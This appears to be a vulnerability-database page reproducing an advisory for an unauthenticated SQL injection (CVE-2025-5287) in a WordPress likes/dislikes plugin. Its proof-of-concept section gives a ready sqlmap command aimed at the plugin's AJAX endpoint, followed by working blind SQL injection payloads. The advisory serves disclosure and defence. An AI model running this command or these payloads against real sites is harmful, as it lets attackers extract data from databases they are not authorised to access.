Lucene search
K

📄 WordPress Likes and Dislikes 1.0.0 SQL Injection

🗓️ 12 Jun 2025 00:00:00Reported by RandomRobbieBFType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 110 Views

Unauthenticated SQL injection in Likes and Dislikes WordPress plugin via post parameter up to 1.0.0.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-5287
16 Jun 202522:25
githubexploit
GithubExploit
Exploit for CVE-2025-5287
12 Jun 202508:34
githubexploit
GithubExploit
Exploit for CVE-2025-5287
31 May 202511:22
githubexploit
Circl
CVE-2025-5287
28 May 202513:47
circl
CNNVD
WordPress plugin Likes and Dislikes Plugin SQL注入漏洞
28 May 202500:00
cnnvd
CVE
CVE-2025-5287
28 May 202508:22
cve
Cvelist
CVE-2025-5287 Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection
28 May 202508:22
cvelist
Nuclei
Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection
4 Jun 202603:48
nuclei
NVD
CVE-2025-5287
28 May 202509:15
nvd
Packet Storm News
WordPress Likes and Dislikes 1.0.0 SQL Injection
28 May 202500:00
packetstormnews
Rows per page
# CVE-2025-5287
    Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection
    
    # Description
    
    The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the 'post' parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
    
    ## Details
    
    - **Type**: plugin
    - **Slug**: inprosysmedia-likes-dislikes-post
    - **Affected Version**: 1.0.0
    - **CVSS Score**: 7.5
    - **CVSS Rating**: High
    - **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    - **CVE**: CVE-2025-5287
    - **Status**: Closed
    
    POC
    ---
    ```
    python3 sqlmap.py -u 'http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php' --data='action=my_likes_dislikes_action&post=1&state=dislike' --level=2 --risk=2 --dbms='MySQL' -p post --random-agent
    ```
    
    ```
    sqlmap identified the following injection point(s) with a total of 372 HTTP(s) requests:
    ---
    Parameter: post (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: action=my_likes_dislikes_action&post=1 AND 8197=(SELECT (CASE WHEN (8197=8197) THEN 8197 ELSE (SELECT 7036 UNION SELECT 3343) END))-- -&state=dislike
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: action=my_likes_dislikes_action&post=1 AND (SELECT 7318 FROM (SELECT(SLEEP(5)))OIPg)&state=dislike
    ---
    ```

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Jun 2025 00:00Current
7.9High risk
Vulners AI Score7.9
CVSS 3.17.5
EPSS0.10008
SSVC
110